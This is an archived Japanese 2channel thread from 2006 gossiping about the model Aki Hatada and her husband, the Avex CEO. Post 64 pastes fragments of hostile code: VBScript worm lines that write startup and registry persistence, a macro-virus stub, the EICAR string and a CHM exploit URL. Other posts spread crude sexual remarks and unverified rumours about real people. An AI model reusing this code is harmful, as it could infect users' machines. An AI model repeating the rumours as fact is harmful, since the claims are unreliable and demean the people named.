2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ViVi】畑田亜希 part3【社長夫人】

1 :無名モデル:2006/08/28(月) 10:17:47 ID:M0YDTDCW
たてますた。

前スレ
【ViVi】畑田亜希 part2【社長夫人】
http://life7.2ch.net/test/read.cgi/model/1098880244/



2 :無名モデル:2006/08/28(月) 10:47:19 ID:xI/9tNZ0


3 :無名モデル:2006/08/28(月) 10:57:34 ID:MJPte5si
3げと(=゜ω゜)ノ

4 :無名モデル:2006/08/28(月) 12:27:48 ID:???
>>1
乙でございます

5 :無名モデル:2006/08/28(月) 21:09:13 ID:VRo5+v9r
現在の松浦の総資産額 151億4066万円
http://quote.yahoo.co.jp/q?s=7860.t&d=3m
エイベックス・グループHD(株) (東証1部:7860)
取引値       2,485円
時価総額    114,702百万円
発行済株式数 46,157,810株

6 :無名モデル:2006/08/28(月) 21:50:38 ID:DEuhR/ry
自称浜崎あゆみ似
http://pr2.cgiboy.com/S/2139146

7 :無名モデル:2006/09/02(土) 20:19:47 ID:OBMVl3hi
二人目産まれたらしいね。

8 :無名モデル:2006/09/02(土) 20:35:11 ID:JecT7aBz
大多数の方がのあは存在しないと言うね。
あとこの人は時間の進み方おかしいね…
こないだ赤ちゃんて書いてたのが今は4歳〜になっていたり…
顔見てみたいのは確かだけど

9 :無名モデル:2006/09/02(土) 20:44:48 ID:lnkLZZyU
赤ちゃんて、この間生まれた長男で、4歳てのは長女のことじゃないの?


10 :無名モデル:2006/09/02(土) 20:49:27 ID:5iLlbhFY
女しかいないよ。

11 :無名モデル:2006/09/02(土) 20:50:53 ID:???
その4歳の子の最初の時
スレチなのでこれで最後…
まぁ都市伝説

12 :無名モデル:2006/09/02(土) 20:57:40 ID:JecT7aBz
書き忘れたごめん!
のあとあきちゃんまじっちゃったね…私はのあのこと書きました!さらば

13 :無名モデル:2006/09/03(日) 10:39:52 ID:qFfSlUtD
子持ちのモデルって亜希のほかに誰かいる?現役で


14 :無名モデル:2006/09/03(日) 12:18:15 ID:???
GLAYのTAKUROの奥さんの岩堀せりがいるよ!それと亜希ちゃんは二人目男の子産んでるよ!avexの後継ぎ息子

15 :無名モデル:2006/09/04(月) 00:23:22 ID:8M5AYn6Y
あきってまえから付き合ってた彼氏とはべつのひととけっこんしたの?

16 :無名モデル:2006/09/04(月) 08:54:50 ID:???
冷静に見て三船美佳、全然似てないし。
魔女鼻ってだけやん。


17 :無名モデル:2006/09/12(火) 14:21:06 ID:???
田舎娘が玉の輿にのって両親大喜び

18 :無名モデル:2006/09/12(火) 14:26:09 ID:ZdFt1ZkM
娘と息子がいるよ

19 :無名モデル:2006/09/13(水) 01:14:56 ID:???
うまく騙して中だしさせて妊娠玉の輿。
あまりにミエミエで私なら恥ずかしくて玉の輿はのりたいけど無理
度胸あるよねー

20 :無名モデル:2006/09/13(水) 02:41:03 ID:???
>>19玉の輿の前に男見つけろよっと!
(´,_ゝ`)プッ。

21 :無名モデル:2006/09/13(水) 03:38:33 ID:???
POPに出てるときに妊娠→結婚するからモデル自体辞めて主婦になるって言ってたのに。

あっさり復帰したね

山口百恵みたいに結婚とともにきっぱり仕事を辞めて主婦するつもり。子供のためにも。とゆう言葉はどこへ…

22 :無名モデル:2006/09/13(水) 19:01:12 ID:Tmf3633X
亜希ちゃんがPOP引退するときのインタビューですげー生々しい話してたよ。
「夜セックルしたあと(←このあたりのニュアンス失念)、彼が急に『愛について』
語りだしたねん、んで『俺、今回赤ちゃんできてると思う』って言った。
そしたら本当にできてたねん!まじびっくりやわ!」 こんな感じ。
あと婚約指輪がカルチェのラブリングだったらしいが、
松浦が昔、浜にあげた色と同じのを亜希ちゃんにあげようとして
「それ昔の彼女にあげたやつやん!色、別のにしてや!」って言ったエピソードとか。

23 :ぁぁ:2006/09/13(水) 19:04:12 ID:KdC94vCH
あきちゃんのダンナってだれ?

24 :無名モデル:2006/09/13(水) 22:32:25 ID:???
>>22
セックスした後に言ったんじゃなくて妊娠してそれが分かるまでに言ったんだよ。

25 :無名モデル:2006/09/14(木) 02:24:53 ID:???
>>22
勝手に文章変えんな
セックスしたあとなんていってないよw前スレでもかきこんでたなお前(´,_ゝ`)
>>21
なんか旦那の金で服とか自分のもの買うのやだとかポップのインタビューで言ってたよ。>>23
エイベ糞の社長

26 :無名モデル:2006/09/14(木) 11:43:35 ID:???
でもやっぱり、金に目がくらんでキモ社長と出来婚狙った感が否めない。
あきちゃん好きだったのになぁ。

27 :無名モデル:2006/09/15(金) 20:55:49 ID:ChqziKOn
http://news18.2ch.net/test/read.cgi/mnewsplus/1093214740/
発売中の写真週刊誌「FLASH」(光文社)が、大手レコード会社「エイベックス」の
“お家騒動”の関連特集をしている。
依田巽会長兼社長(64)を代表の座から引きずり降ろし、“次期社長”といわれる
松浦勝人執行役員(39)の東京・田園調布に立つ大豪邸の写真を掲載しているのだ。
一昨年1月に建設されたこの邸宅は敷地面積478坪。地上2階、地下2階建てで、
邸内にはプールやディスコまである。地下には車が30台は駐車できる駐車場も完備され、
フェラーリなど高級車がズラリと並んでいる。
小高い丘の上に立つ要塞(ようさい)のような邸宅は高級住宅街で知られる田園調布の
中でもひときわ異彩を放っている。松浦氏はここに昨年11月に結婚した元モデルの
畑田亜希(22)と今春生まれたばかりの長女の3人で暮らしている。
総工費40億円といわれる“松浦御殿”。
その柱の一本一本はエイベックスに所属する浜崎あゆみ、安室奈美恵といった
人気アーティストたちが稼ぎ出したものだ。
「浜崎と安室の2人のアルバムだけで軽く2000万枚を売り上げている。金額にして
600億円以上。松浦氏はそんなレコード会社の創業者。40億円くらいはどうにでも
なるということでしょう」(レコード会社関係者)
昨年、一部マスコミで税金の滞納で豪邸が差し押さえられたと報じられたのが不思議だ。
松浦氏はエイベックスの総発行株式の13.2%を保有。同社の株価は一連の騒動で
大きく下がったが、それでも時価総額で100億円近い大金持ちである。
昨年度の推定収入は2億8000万円だ。
松浦氏が社長に就任するのは9月の臨時株主総会後といわれている。神奈川の貸しレコード店
をわずか15年で年商459億円(03年度)の企業にまで押し上げた手腕をこれからは
だれに気兼ねすることもなく発揮できる。果たしてうまくいくか。
豪邸の次に目指すものは何か。
松浦氏の成り上がりぶり、いやリッチぶりがあらためてわかる。

28 :無名モデル:2006/09/15(金) 21:53:06 ID:6x8ptGFM
>>26
あきちゃんの私物とか結構普通ですよ

29 :無名モデル:2006/09/15(金) 22:04:06 ID:???
私物も昔と変わらないよね

30 :無名モデル:2006/09/15(金) 22:26:42 ID:IW9k9UaE
名字何て読むの?

31 :無名モデル:2006/09/15(金) 23:59:03 ID:???
松浦のあの顔だけはどんなに金持ってても無理!!!!!!!
キモス!!!

32 :無名モデル:2006/09/16(土) 00:04:32 ID:???
>>31お前は屁にもならんから安心汁!

33 :無名モデル:2006/09/16(土) 01:33:06 ID:???
>>32
DQN決定
松浦オタ発見ww

34 :無名モデル:2006/09/16(土) 02:10:22 ID:???
モデル板ほど醜い板もないと思うけど。このスレはまだいいけど、女の嫉みって恐いよね〜。

35 :無名モデル:2006/09/16(土) 02:17:54 ID:???
>>33香ばしいDQNにヲタ呼ばわりだよw
まずは男作れなw

36 :無名モデル:2006/09/16(土) 02:22:36 ID:???
今月のvivi別冊に好きな男性のタイプ=木村拓哉ってかいてるね。

2002年Pop見たときから、
綺麗で可愛くて大好き。写真集欲しいな。

37 :無名モデル:2006/09/16(土) 02:49:07 ID:9DGWznOu
畑田亜希ってニューハーフみたい
http://j.joseishi.net/vivi/machi/aki/200507/aki-240.html

38 :無名モデル:2006/09/16(土) 02:52:38 ID:???
亜希ちゃん程の美人さんならキムタクレベルの男と結婚出来ただろーに・・
もったいない・・・

39 :無名モデル:2006/09/16(土) 08:36:06 ID:mdUNgJNx
100億にはかなわない…


40 :無名モデル:2006/09/16(土) 09:00:58 ID:qjVRTmE7
今に安心すべし☆

41 :無名モデル:2006/09/16(土) 10:27:33 ID:???
>>35
それはお前だろーがww
こっちはとっくに間にあってんだよ

42 :無名モデル:2006/09/16(土) 15:51:42 ID:EUwFSw0F
昔から凄くキレイ!とか言われてるけどこの人全然キレイと思わない。むしろブスだし崩れてる。目がすごーく離れててわし鼻だし魚みたい。でも肌は凄くキレイ。雑誌で見ると欠点ばかり目につくけど実際は美人なんだろうね

43 :無名モデル:2006/09/16(土) 18:03:29 ID:+BgOz7yv
昔、別冊Popteenから写真集だしたよー  パンチラいっぱい載ってるよ

44 :無名モデル:2006/09/16(土) 18:05:50 ID:???
昔から金はなかったが胸だけはある

45 :無名モデル:2006/09/16(土) 20:02:10 ID:???
写真集はエロ過ぎだったよ衝撃受けた記憶が

46 :無名モデル:2006/09/17(日) 08:57:33 ID:irK0ndMD
巨乳だよね・・・うらやましい

47 :無名モデル:2006/09/17(日) 11:19:16 ID:???
昔のナチュラルメイクの亜希ちゃんは本当可愛かった頃のアユにそっくりだったよね。

48 :無名モデル:2006/09/18(月) 14:27:07 ID:wKQmdBtP
亜希ちゃん綺麗すぎ☆

49 :無名モデル:2006/09/18(月) 14:30:17 ID:???
>>44高校時代はあんまなかったって聞いたけど豊胸ってデマ?

50 :無名モデル:2006/09/18(月) 14:37:41 ID:9rEq33JM
現在の松浦の総資産額 152億6250万円
http://quote.yahoo.co.jp/q?s=7860.t&d=3m
エイベックス・グループHD(株) (東証1部:7860)
取引値       2,505円
時価総額    115,625百万円
発行済株式数 46,157,810株

51 :無名モデル:2006/09/18(月) 15:51:59 ID:ELD9GPjP
少なくとも高一のときすでに乳でかかった。
それ以前は知らん。

52 :無名モデル:2006/09/18(月) 16:21:50 ID:???
>>49読モ時代から巨乳だったよ

53 :無名モデル:2006/09/20(水) 04:19:02 ID:tlNidOMe
華頂高校出身の先輩が かなり気が強いって言ってた

54 :無名モデル:2006/09/20(水) 20:14:58 ID:mBGVGcra
畑田亜希PBインタビュー

「デキる男」よりも抜けてるくらいの人のほうがええな

「ほんま、どこまで脱いだらええんやろって。プーケットに向かう機中、ずっと
緊張してたんですわ。ぶっちゃけ(笑)。ずっとファッション誌のモデルをやって
きたもんで、男のコに見せる写真は初めてやったからね。
撮影現場でもポージングに苦労しましたわ。ほら、洋服を見せるためのポーズ
やったら得意なんやけど、グラビアでは亜希自身を見せるわけやから。
立つにしても寝転ぶにしても、「どないしたらええんやろ!?」ってな戸惑いもありました。
でもまあ、根は負けず嫌いな性分やからね。腹を決めたら「よしこい!!」ですわ。
ポラを見ながら、「これなら男のコもたまらんやろ」な〜んて想像してみたり。
でもな、亜希がそう思ったカットに限って使われへんの。まだ男心がようわかってないみたい。
普段の亜希はな、写真に写るイメージとは逆。わりと男のコっぽい、ていうか、
「おかん」みたいな性格やね(笑)。男のコの前でも、しおらしく振る舞うより激しく突っ込み
入れるほうやから、一緒に飲みに行って、そそうすると、「ナニこぼしとるん!?ちゃんとしーな。
早く拭きーな(怒)」みたいな。面倒見はいいほうやね。カレシができたら、
部屋の掃除とかご飯作ったりすすんでやると思うで。だから、几帳面でデキる男タイプよりも、
抜けてるくらいの人のほうがええな。鞄の中身がいっつもグチャグチャしてるような男のコ。
で、「そこにしまったやん。しっかりしーな」って突っ込み入れられる奴がたまらんな。」

ttp://www.borujoa.org/upload/source/upload7628.jpg

55 :無名モデル:2006/09/25(月) 18:26:15 ID:WKmZsmeG
長男の名前わかる?

56 :無名モデル:2006/09/25(月) 19:30:59 ID:/TvlAkmD
http://www.joseishi.net/vivi/model/wall/images/junaki0309-b.jpg
http://www.joseishi.net/vivi/model/wall/images/sachiaki0310-b.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2004-12/gazouimages/305.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2004-12/gazouimages/furoku.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2005-02/gazouimages/154155.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2005-03/gazouimages/164.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2005-04/gazouimages/192.jpg
http://www.joseishi.net/vivi/magazine/mokuji/2005-10/furoku.html
http://www.joseishi.net/vivi/magazine/mokuji/2005-11/186.html

57 :無名モデル:2006/09/28(木) 17:58:32 ID:YbbZ/YE4
亜希ちゃん鬼美人

58 :無名モデル:2006/10/10(火) 14:30:50 ID:???
セレブ★

59 :無名モデル:2006/10/29(日) 09:37:50 ID:???
>>37 何か亜希ちゃんかなり老けちゃったように見えるけどこれ最近?
まあ、歳とったから仕方ないけど
中身がついてきてれば、歳取っても育児中でも
中から輝いている人に見えるはずなんだけど別人みたいだね

>>52 pop初登場の98年の時かなりの貧乳でしたよ。
豊胸は地元でも有名でっせ。
まああんだけ美人だったら欠点が胸が貧乳でも全然いいのにね。
今は子供も生んだしオーラないだの言われてるけど
実物を亜希ちゃんが高校位の時、京都の四条の京極で見たことあるけど
ちっさ!ってイメージで凄い可愛かった。
足は大脚ぽく綺麗ではなかったけどめちゃめちゃ可愛かった。

60 :無名モデル:2006/10/29(日) 10:15:14 ID:???
亜希ちゃんを妬むな☆

61 :無名モデル:2006/10/29(日) 11:35:19 ID:g7NYb1ar
美人だと全然思えない。
ヌサイクだろ…
まぁモデルは顔じゃないか。


62 :無名モデル:2006/10/29(日) 11:37:46 ID:???
なりたい顔というか好みマックスのルックスは土屋アンナとひなの
前は10代の頃のオリビア(今はがり過ぎる)
小さい頃からハーフやくどすぎない外人に萌えていた

63 :無名モデル:2006/10/29(日) 13:03:09 ID:???
>>59
最近ではないと思うよ。おそらく長女を出産したその年じゃないかな?
なんとなくお疲れ気味に見えるよね。

子供産んでからの亜希ちゃんは、老けた・・・というか少し落ち着いた感じに見える時がある。
10月号のVIVI別冊の自宅で撮った写真とか。

64 :<body onload=window()>:2006/10/29(日) 14:20:05 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

65 :無名モデル:2006/10/29(日) 17:24:18 ID:KclXCwaW
>>63
自宅って、あの田園調布の40億の豪邸?


66 :無名モデル:2006/10/30(月) 08:11:00 ID:89kaQw0J
最近ViViにほとんど出てないけど・・・
他の雑誌にでてるの?

67 :無名モデル:2006/10/30(月) 22:44:55 ID:DSmC0baf
二番目産んでまだ乳離れしてないからじゃない?

68 :無名モデル:2006/11/02(木) 21:56:50 ID:hBY++eOx
あと、2〜3人ぐらい1年おきに産むそう…


69 :無名モデル:2006/11/07(火) 19:29:48 ID:KDeZXdNp
今は何してるの?田園調布にこもってるの?

70 :無名モデル:2006/11/07(火) 21:06:29 ID:cv4P5oNt
昔からお金大好きみたいだね

71 :無名モデル:2006/11/07(火) 22:02:48 ID:601r2aYX
そりゃ金大好きじゃなきゃあいつと結婚できないでしょ

72 :無名モデル:2006/11/10(金) 17:40:46 ID:S38VTig1
金以外の名目は何と言ってるの?


73 :無名モデル:2006/11/10(金) 18:12:02 ID:L3RdV80p
昔POPで結婚発表した時に“そう思われんのやだから周りには言わなかった”って言ってなかった?

74 :無名モデル:2006/11/10(金) 18:43:13 ID:6kpYZFeV
松浦って浜とつきあってたの?なんで浜を売り出したの?

75 :無名モデル:2006/11/11(土) 18:05:04 ID:M5ozzW36
http://www.avexnet.or.jp/ayu/popup/050712/index.html
あゆは僕にとってそしてエイベックスにとって
最初で最後の特別な存在であり才能だと思っている。
そしてもうこれから先、「produced by max matsuura」 という表記は
僕が今後誰をプロデュースしようと浜崎のクレジットにしか載せるつもりはない。
あまり語ったことはないけど浜崎と俺の関係はともに戦った戦友であり、
お互いにとってかけがえのない存在だ。
どちらかがいないというのはありえない
俺たち2人は誰も割って入れない関係
まぁそんなとこだ


76 :無名モデル:2006/11/12(日) 09:02:31 ID:fupwTEXk
sex好きそう

77 :無名モデル:2006/11/23(木) 15:14:48 ID:???
松浦の顔見ただけで食欲失せる
畑田って金の為にあんなとよく結婚したね

78 :無名モデル:2006/11/25(土) 20:30:11 ID:q8/FdV4W
現在の松浦の総資産額 107億1734万円
http://quote.yahoo.co.jp/q?s=7860.t&d=3m
エイベックス・グループHD(株) (東証1部:7860)
取引値       1,759円
時価総額    81,192百万円
発行済株式数 46,157,810株

79 :無名モデル:2006/11/25(土) 23:43:33 ID:QeXBYriQ
まだ社会的には若いのにスゴいね


80 :無名モデル:2006/11/25(土) 23:49:10 ID:E8kjP973
松浦だってさあゆのおかげでこんな資産てにいれたわけで。あゆは松浦のおかげでびっくになれたわけだからお互い一生なくてはならない存在なんじゃないの?人生のカケガエノナイヒト。つきあってたのは本当?

81 :無名モデル:2006/11/25(土) 23:51:41 ID:MHOr2Roc
どんな子育てするんだろ

82 :無名モデル:2006/11/26(日) 00:32:31 ID:QtJ5PECD
良いよな。亜希ちゃむカワユイし
社長は好きだがエイベ糞は嫌いだ。
なんて矛盾‥

83 :無名モデル:2006/11/26(日) 01:41:04 ID:azmw3vr4
亜希の子育ての話や、家庭の話を聞いてみたいな。




84 :無名モデル:2006/11/26(日) 04:19:15 ID:P7EwcyMQ
んー必ずしも中身があれば外見が年とっても輝くってのは違うとおもうけど

亜希ちゃんめちゃくちゃ美人だわー

85 :無名モデル:2006/11/27(月) 22:00:17 ID:iyFUEGEd
http://www.kireime.com/data-file/main-aki.html
● 自分について
「性格を自己分析すると天真爛漫。落ち込んだときは考え込んでおとなしくなるけど、
プラス思考に考え直すようにしてる。この時期を乗り越えればまたひと回りおっきく
なれるんだって。亜希の好きな言葉に“チャンスの神様には後ろ髪がない!!”って
いうのがあるんだけど、いつまでもジメジメしてるとチャンスも逃げちゃうから。
そうやって壁を乗り越えながら、みんなに認めてもらえるようなできる女になりたい。
だから“亜希チャンみたいになりたい”っていわれると、めちゃめちゃテレるけどうれしい」

86 :無名モデル:2006/12/10(日) 22:56:30 ID:???
亜希タンの写真集欲しいお
亜希たんの巨乳でシコシコドピュしたいんだお(;´Д`)ハァハァ

87 : ◆DyqSmrxUck :2006/12/13(水) 08:30:54 ID:???


88 :無名モデル:2006/12/26(火) 18:38:13 ID:wGGqA9I3
最近ViViに載ってるかな?☆

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)